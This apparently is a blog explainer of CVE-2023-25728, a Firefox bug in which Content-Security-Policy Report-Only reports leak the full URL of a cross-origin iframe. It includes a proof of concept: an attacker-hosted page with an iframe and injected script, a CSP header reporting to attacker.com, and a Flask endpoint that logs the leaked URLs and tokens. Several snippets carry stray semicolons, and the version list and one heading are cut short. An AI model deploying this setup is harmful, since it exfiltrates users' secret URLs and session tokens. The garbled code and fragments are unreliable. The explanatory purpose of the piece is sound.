CVE-2023-25728 - How Leaky CSP Reporting in Firefox Could Expose Sensitive iframe URLs

Let’s dive deep into CVE-2023-25728—a subtle but critical security flaw that affected Firefox and Thunderbird in early 2023. This vulnerability was tied to how browsers reported the Content-Security-Policy-Report-Only violations, specifically in situations involving iframes and redirects. This post aims to make the technical details crystal clear and show you how attackers could misuse this issue, even including code snippets and real-world consequences.

What Is CVE-2023-25728?

This vulnerability lets an attacker learn the full, unredacted URL of content loaded inside a child <iframe>, bypassing usual security boundaries. The leak happens when an iframe is involved in a redirect and triggers a CSP Report-Only policy, letting attackers see URLs they aren’t supposed to access.

Firefox ESR < 102.8

Security Level: Moderate-to-high for sensitive apps with iframed content.

Understanding the Vulnerability

Normally, web security isolates iframes so that the parent page can’t see the contents or URL of a cross-origin frame. However, the Content-Security-Policy-Report-Only header is used by websites to monitor (but not enforce) potential violations.

If you set a policy like

Content-Security-Policy-Report-Only: default-src 'self'; report-uri /csp-report-endpoint

the browser will POST JSON reports when a violation occurs, including details about the offending resource.

Bug: In affected Firefox versions, if a violation happens due to a redirect in an iframe, the CSP report will include the iframe’s *exact* URL—even if it’s from another origin.

Example report (redacted for privacy, but in this bug, NOT!)

{
  "csp-report": {
    "document-uri": "https://attacker.com/parent.html";,
    "blocked-uri": "https://private-victim.com/secret/page?token=password123";,
    "violated-directive": "default-src 'self'",
    ...
  }
}

Notice how blocked-uri reveals the child iframe’s secret URL.

Setting the Stage

Imagine an attacker controls a site, attacker.com, and wants to steal sensitive URLs from a target like bank.com. Suppose bank.com embeds a secret iframe:

<iframe src="https://private-victim.com/secret/page?token=password123";></iframe>

Normally, the parent page can’t know the iframe’s URL (browser security blocks it).

The Attacker’s Steps

1. Trick target into embedding attack code: The attacker injects (via XSS or another method) some CSP-Report-Only headers and code.
2. Iframe triggers CSP policy violation after a redirect: For example, the iframe loads a resource (perhaps an image or script) that causes a redirect, violating the CSP policy.
3. Leaked URL in CSP report: Firefox automatically POSTs a JSON report to the attacker’s server, which now includes the full, sensitive iframe URL.

Attacker-hosted page:

<!-- parent.html hosted at attacker.com -->
<iframe src="https://victim.com/secret/data?session=token"></iframe>;
<script>
    // Force loading of something to create a CSP violation, e.g. an unauthorized script
    var s = document.createElement('script');
    s.src = "https://victim.com/evil.js";; // triggers CSP violation via cross-origin
    document.body.appendChild(s);
</script>

Site sets:

Content-Security-Policy-Report-Only: default-src 'self'; report-uri https://attacker.com/report

Attacker’s report endpoint:

from flask import Flask, request

app = Flask(__name__)

@app.route('/report', methods=['POST'])
def report():
    print(request.json)  # logs leaked iframe URL!
    return '', 204

Internal endpoints

Anything loaded as an iframe and subject to redirects could potentially have its URL disclosed—even if browsers otherwise restrict parent access.

Mozilla fixed this in Firefox 110 and Thunderbird 102.8. Upgrade now!

- Mozilla Foundation Security Advisory 2023-06

References

- CVE-2023-25728 at NVD
- Mozilla Security Bug 1813242
- Content Security Policy (MDN)
- Mozilla Security Advisories

Closing Thoughts

Though this bug flew under the radar, it’s a reminder: even “just reporting” security features can endanger user privacy if not careful. Always keep browsers up to date, and treat CSP report data as potentially sensitive—especially if your site handles confidential content in embedded iframes.

Timeline

Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/08/2023 14:01:00 UTC